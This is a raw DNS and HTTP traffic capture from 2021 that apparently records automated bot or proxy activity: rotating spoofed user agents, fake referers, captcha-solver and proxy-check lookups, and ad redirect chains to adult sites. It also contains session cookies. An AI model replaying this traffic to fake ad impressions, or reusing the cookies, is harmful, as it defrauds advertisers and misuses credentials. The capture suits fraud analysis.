/cimp.php?data=TVRZek1Ea3lNVGN4Tm54bVpqVTJNRE16WlRZNFpXWXhObUUzTlRGak1XVTJZV0V3WXpZMFlUVTNaUS0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1wb3JuaHViLGJpZCxhZHYscGhwJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablRPbmRLNlYwcnFyYlhTdWxkSzZaMHJwWFN1bGRNNlYwcnBYVjFhYTFWeTNUYWFjVGNhMGE2YjUwVVMyV3owMDhWejJ1cmwwbXpxNDRzdW9ycWxwejI0bG9tbnRzbHAxbjBxMjJkZFBaVlpTNFFTQTZQcEhwM3M1enBYU3VsZE5LNlYwcnBYU3VsY0gyQS0tfGh0dHB8MTU0LjYxLjcxLjUxfFVTQXw0MXxhZC1tYXZlbi5jb218NTMxMjk0fDQzMDY3NXw4MTYyNjF8MzU3NjQxMXw1MDh8NDU3MDAwNnw1ODkxOTAxNHwyfDF8MHwwfDU4OHw5Mjc1NzR8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fDY1YmM1NjA5MWJiZjFmYzNjYmVhMzMwNzgyNDRmNjI4fDYwYjFhNWZmNzkzNjUwNGFkZjAzMTI4NzA0YzJiNWRkfDF8MHxwb3JuaHViLmJpZHwwfDB8MHwwLjEyfDF8MHxleGNoYW5nZV9saW5rfDB8MHwwfC0xfDB8MHx8fDJ8NzIwfHwwfDB8MHwxMHwwfDB8MXwwfE9LfGFkZWJmOWYzZDZhMzE0MDkyZGE5NGZmOTM2OWY3ZDJi&p=http%3A%2F%2Fpornhub.bid%2Fadv.php&tested=1&check=f6f2fdcdcbcb1084d3cbe541118d0e3b&screen_resolution=1024x768&container_resolution=691x425&iframe=0 HTTP/1.1
Host: s.optnx.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; Touch; WebView/1.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://s.optnx.com/cimp.php?data=TVRZek1Ea3lNVGN4Tm54bVpqVTJNRE16WlRZNFpXWXhObUUzTlRGak1XVTJZV0V3WXpZMFlUVTNaUS0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1wb3JuaHViLGJpZCxhZHYscGhwJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablRPbmRLNlYwcnFyYlhTdWxkSzZaMHJwWFN1bGRNNlYwcnBYVjFhYTFWeTNUYWFjVGNhMGE2YjUwVVMyV3owMDhWejJ1cmwwbXpxNDRzdW9ycWxwejI0bG9tbnRzbHAxbjBxMjJkZFBaVlpTNFFTQTZQcEhwM3M1enBYU3VsZE5LNlYwcnBYU3VsY0gyQS0tfGh0dHB8MTU0LjYxLjcxLjUxfFVTQXw0MXxhZC1tYXZlbi5jb218NTMxMjk0fDQzMDY3NXw4MTYyNjF8MzU3NjQxMXw1MDh8NDU3MDAwNnw1ODkxOTAxNHwyfDF8MHwwfDU4OHw5Mjc1NzR8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fDY1YmM1NjA5MWJiZjFmYzNjYmVhMzMwNzgyNDRmNjI4fDYwYjFhNWZmNzkzNjUwNGFkZjAzMTI4NzA0YzJiNWRkfDF8MHxwb3JuaHViLmJpZHwwfDB8MHwwLjEyfDF8MHxleGNoYW5nZV9saW5rfDB8MHwwfC0xfDB8MHx8fDJ8NzIwfHwwfDB8MHwxMHwwfDB8MXwwfE9LfGFkZWJmOWYzZDZhMzE0MDkyZGE5NGZmOTM2OWY3ZDJi
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: __uvt=a%3A1%3A%7Bi%3A0%3Bs%3A32%3A%226135e417e86b06.45763620277972215%22%3B%7D
ResponseHTTP/1.1 302 Found
Server: nginx
Date: Mon, 06 Sep 2021 09:50:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __uvt=a%3A1%3A%7Bi%3A0%3Bs%3A32%3A%226135e417e86b06.45763620277972215%22%3B%7D; expires=Wed, 06 Sep 2023 09:50:12 GMT; path=; domain=.optnx.com;
Set-Cookie: impressions=x%9C%ABV2157000%D35%B5%B04%B4404Q%B2%8A6%D41436%B042%B404%D2172%88%AD%05%00%A7%04%08%8A; expires=Mon, 06 Sep 2021 21:50:12 GMT; path=/; domain=.optnx.com;
Set-Cookie: c-tag=%7B%22tag-link%22%3A%22v3%7C%7CUSA%7C3576411%7C58919014%7C0%7C%7C508%7C41%7C1%7C2%7C0%7C0%7C0%7C588%7C0%7C0%7C0%7C1%7C0%7C0%7C0%7C0%7C1%7C0%7C0%7C0%7C6135e417e86b06.45763620277972215%7C60b1a5ff7936504adf03128704c2b5dd%7C927574%7Cpornhub.bid%7C1024x768%7C%7C0%7C0%7C0%7C10%7C0%7C0%7C0%7C0%7C0%7Cok%22%7D; expires=Tue, 07 Sep 2021 09:50:12 GMT; path=/; domain=.optnx.com;
Location: https://furricity-nursubaru.xyz/95999da2-6e21-49b2-959c-1cc698b66db5?zoneid=3576411&source=ad-maven.com&varid=58919014&keyword=&tags=pornhub,bid,adv,php&siteid=816261&campid=4570006&catid=508&country=USA&format=&cost=0.0005&tag=oodNVTHXNHZNHVM45c3UVWV0zTOqtumulmpdK51UtrqZnTOndK6V0rqrbXSuldK6Z0rpXSuldM6V0rpXV1aa1Vy3TaacTca0a6b50US2Wz008Vz2url0mzq44suorqlpz24lomntslp1n0q22ddPZVZS4QSA6PpHp3s5zpXSuldNK6V0rpXSulcH2A--&exffir=eyJjIjoiZjZmMmZkY2RjYmNiMTA4NGQzY2JlNTQxMTE4ZDBlM2IiLCJ0IjoiMSIsInNyIjoiMTAyNHg3NjgiLCJjciI6IjY5MXg0MjUiLCJpIjoiMCJ9
-
POSThttp://masde.live/adw.phpRequestPOST /adw.php HTTP/1.1
Host: masde.live
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.85 Safari/537.36 Vivaldi/2.3.1401.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://toptraffic.site/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:13 GMT
Content-Length: 57785
Connection: close
-
DNSwww.fastmetrics.comRequestwww.fastmetrics.comIN AResponsewww.fastmetrics.comIN A216.38.130.100
-
DNSjav8.usRequestjav8.usIN AResponsejav8.usIN A207.180.237.38
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
GEThttp://jav8.us/adv.phpRequestGET /adv.php HTTP/1.1
Host: jav8.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T230NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627611&t=2f98d03b2f7e693a&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627611&t=2f98d03b2f7e693a&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627611
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:50:18 GMT
Location: http://bongacams.com/track?c=639078&subid=627611
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A172.67.75.150
-
DNSfastmetrics.formstack.comRequestfastmetrics.formstack.comIN AResponsefastmetrics.formstack.comIN CNAMEformstack.comformstack.comIN A52.222.139.46formstack.comIN A52.222.139.63formstack.comIN A52.222.139.105formstack.comIN A52.222.139.76
-
DNS113.t.keepitpumpin.ioRequest113.t.keepitpumpin.ioIN AResponse113.t.keepitpumpin.ioIN A212.83.164.166
-
DNSwww.fastmetrics.comRequestwww.fastmetrics.comIN AResponsewww.fastmetrics.comIN A216.38.130.100
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A172.67.75.150
-
DNSads.stickyadstv.comRequestads.stickyadstv.comIN AResponseads.stickyadstv.comIN CNAMEip1.ads.stickyadstv.com.akadns.netip1.ads.stickyadstv.com.akadns.netIN CNAMEip2.ads.stickyadstv.com.akadns.netip2.ads.stickyadstv.com.akadns.netIN CNAMEcidr1.ads.stickyadstv.com.akadns.netcidr1.ads.stickyadstv.com.akadns.netIN CNAMEstickyadstv.com.edgekey.netstickyadstv.com.edgekey.netIN CNAMEe11676.b.akamaiedge.nete11676.b.akamaiedge.netIN A104.123.41.104
-
DNSwww.fastmetrics.comRequestwww.fastmetrics.comIN AResponsewww.fastmetrics.comIN A216.38.130.100
-
DNSwww.fastmetrics.comRequestwww.fastmetrics.comIN AResponsewww.fastmetrics.comIN A216.38.130.100
-
DNScsm.nl.eu.criteo.netRequestcsm.nl.eu.criteo.netIN AResponsecsm.nl.eu.criteo.netIN CNAMEcsm.am5.vip.prod.criteo.netcsm.am5.vip.prod.criteo.netIN A178.250.2.150
-
DNSdist.acnav.onlineRequestdist.acnav.onlineIN AResponsedist.acnav.onlineIN CNAMEhidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.comhidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.comIN A3.232.242.170hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.comIN A54.91.59.199hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.comIN A52.20.78.240hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.comIN A3.220.57.224
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.89millustry.topIN A13.227.222.73millustry.topIN A13.227.222.102millustry.topIN A13.227.222.110
-
GEThttp://millustry.top/redirect?tid=927089RequestGET /redirect?tid=927089 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; managedpc; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://jav8.us/adv.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:50:23 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
set-cookie: csu=e5a558d1-dd1f-4398-9fcf-7b279a9bf6cc
Location: http://s.optnx.com/cimp.php?data=TVRZek1Ea3lNVGd5TTN3NFkyRTVPVGN4TlRjek1UUmxZMlV3WTJRM1pEWmxPVFEyT0RBMFlqTXlPUS0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1qYXY4LHVzLGFkdixwaHAmc2l0ZWlkPTgxNjI2MSZjYW1waWQ9NDU3MDAwNiZjYXRpZD01MDgmY291bnRyeT1VU0EmZm9ybWF0PSZjb3N0PTAuMDAwNSZ0YWc9b29kTlZUSFhOSFpOSFZNNDVjM1VWV1YwelRPcXR1bXVsbXBkSzUxVXRycVpuVE9vZEs2VjBycXJiWFN1bGRLNlowcnBYU3VsZE02VjBycFhaMlVhWnkyY2I2N1hUVVdXY2I2YVM2MVoxYlY3WGE4VE80MWxxcDQ0dXE0MDJycDQybDBtdG9zMDN6MTF1bjB0bmRkUFpMYmM3ek5Gc1p5dWM2VjBycFhUVE9sZEs2VjBycFhCOWctLXxodHRwfDE1NC42MS43MS41MXxVU0F8NDF8YWQtbWF2ZW4uY29tfDUzMTI5NHw0MzA2NzV8ODE2MjYxfDM1NzY0MTF8NTA4fDQ1NzAwMDZ8NTg5MTkwMTR8M3wxfDB8MHw1ODh8OTI3MDg5fDUwfDc1fFVTRHxVU0R8MXwxfDIyfHwxfFVTQXx8MTB8NHwwfHxhNzNiYTA3ZmVjZDkxMzc3ZmViYjBjNWE1ZDZkOWNmMXxmYzA1NGZmOTVmYmQ2NGZkMGIxODM3YmVhY2M5MmI4MnwxfDB8amF2OC51c3wwfDB8MHwwLjF8MXwwfGV4Y2hhbmdlX2xpbmt8MHwwfDB8LTF8MHwwfHx8Mnw3MjB8fDB8MHwwfDExfDB8MHwxfDB8T0t8MzViYjBlOGE1ZTUwMmQ2NjRhOWViNTNmODM5MzAyMDA-
X-Cache: Miss from cloudfront
Via: 1.1 eec12a22159207af63748eccf10799b3.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: sbtNv8P4pWae1ScFmIfwm-feQYHc4iT7Uwz1MV4cUMCj6rNZs5nG9Q==
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSbaide.liveRequestbaide.liveIN AResponsebaide.liveIN A212.107.18.203
-
DNSpornhub.bidRequestpornhub.bidIN AResponsepornhub.bidIN A207.180.237.38
-
DNSweightlose.twRequestweightlose.twIN AResponseweightlose.twIN A207.180.237.38
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
GEThttp://alfad.pro/go/266933/627550RequestGET /go/266933/627550 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.68
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:50:23 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
POSThttp://baide.live/ads.phpRequestPOST /ads.php HTTP/1.1
Host: baide.live
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://toptraffic.site/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:23 GMT
Content-Length: 57785
Connection: close
-
GEThttp://pornhub.bid/adv.phpRequestGET /adv.php HTTP/1.1
Host: pornhub.bid
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627004&t=104079a4c8542b08&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627004&t=104079a4c8542b08&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627004
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:50:23 GMT
Location: http://bongacams.com/track?c=639078&subid=627004
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://alfad.pro/go/266933/627598RequestGET /go/266933/627598 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.9) Gecko/20100101 Goanna/3.4 Firefox/52.9 PaleMoon/27.9.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:50:23 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://weightlose.tw/index.htmlRequestGET /index.html HTTP/1.1
Host: weightlose.tw
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:23 GMT
Content-Type: text/html
Content-Length: 313
Last-Modified: Thu, 24 Jun 2021 01:36:35 GMT
Connection: keep-alive
ETag: "60d3e1a3-139"
Accept-Ranges: bytes
-
DNSyesdd.liveRequestyesdd.liveIN AResponseyesdd.liveIN A212.107.18.203
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.89millustry.topIN A13.227.222.102millustry.topIN A13.227.222.73millustry.topIN A13.227.222.110
-
DNSweb.gotfuck.ruRequestweb.gotfuck.ruIN AResponseweb.gotfuck.ruIN CNAMEgotfuck.rugotfuck.ruIN A167.86.103.60
-
DNSlovekiss.xyzRequestlovekiss.xyzIN AResponselovekiss.xyzIN A207.180.237.38
-
GEThttp://yesdd.live/ads.phpRequestGET /ads.php HTTP/1.1
Host: yesdd.live
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:23 GMT
Content-Length: 57785
Connection: close
-
GEThttp://lovekiss.xyz/adv.phpRequestGET /adv.php HTTP/1.1
Host: lovekiss.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Goanna/4.0 Firefox/55.0 Basilisk/20171228
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://millustry.top/redirect?tid=936474RequestGET /redirect?tid=936474 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.0.9895 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://jpav.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:50:23 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
set-cookie: csu=e6fc97d0-337e-4871-9166-9fd79b8b37b6
Location: https://xml.bid-engine.com/click?i=CuwXqatJOw0_0
X-Cache: Miss from cloudfront
Via: 1.1 4e4c50c641418e6aad9ec09cb0f22845.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: lIKV0d0-LhKFAIOQHIFONK_fie7aFVD6oHyVWqoihzN4vpKU-Q1iWg==
-
DNSifake.proRequestifake.proIN AResponseifake.proIN A45.76.155.77
-
GEThttp://ifake.pro/ip?serial_number=DX4RX001FF9YRequestGET /ip?serial_number=DX4RX001FF9Y HTTP/1.1
Host: ifake.pro
Accept: */*
Pragma: no-cache
Connection: keep-alive
Cookie: connect.sid=s%3A50BlUPy_fGZfC5HurCF2CmfNLcprx9aK.gNqvNrgCf9Tc7YZHVYobBRJu%2FLjESNsYRYv%2F5PPnv4o
User-Agent: iFakeProTools/5.9.6 CFNetwork/978.0.7 Darwin/18.7.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
X-Powered-By: iThanh
Vary: Origin, Accept-Encoding
Access-Control-Allow-Credentials: true
Strict-Transport-Security: max-age=5184000; includeSubDomains
Content-Type: text/html; charset=utf-8
Content-Length: 12
ETag: W/"c-T+jtdWoufQlJnZYss//Zp9PiBJU"
Date: Mon, 06 Sep 2021 09:50:27 GMT
Connection: keep-alive
-
DNS52d8.infoRequest52d8.infoIN AResponse52d8.infoIN A212.107.18.203
-
DNSxmom.usRequestxmom.usIN AResponsexmom.usIN A167.86.121.34
-
DNSweb4.sexybody.xyzRequestweb4.sexybody.xyzIN AResponseweb4.sexybody.xyzIN CNAMEsexybody.xyzsexybody.xyzIN A167.86.103.60
-
DNSlangmm.infoRequestlangmm.infoIN AResponselangmm.infoIN A5.181.218.143
-
POSThttp://52d8.info/adu.phpRequestPOST /adu.php HTTP/1.1
Host: 52d8.info
Connection: keep-alive
Content-Length: 1
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://toptraffic.site/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:28 GMT
Content-Length: 57785
Connection: close
-
GEThttp://xmom.us/index.htmlRequestGET /index.html HTTP/1.1
Host: xmom.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:27 GMT
Content-Type: text/html
Content-Length: 270
Last-Modified: Wed, 01 Sep 2021 06:08:42 GMT
Connection: keep-alive
ETag: "612f18ea-10e"
Accept-Ranges: bytes
-
GEThttp://web4.sexybody.xyz/ungweb4.phpRequestGET /ungweb4.php HTTP/1.1
Host: web4.sexybody.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://langmm.info/a.phpRequestGET /a.php HTTP/1.1
Host: langmm.info
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:28 GMT
Content-Length: 57783
Connection: close
-
DNSjump.ogtrk.netRequestjump.ogtrk.netIN AResponsejump.ogtrk.netIN CNAMEogmobi-elb.go2cloud.orgogmobi-elb.go2cloud.orgIN A34.231.253.254ogmobi-elb.go2cloud.orgIN A23.21.51.144ogmobi-elb.go2cloud.orgIN A3.211.159.49
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:32 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
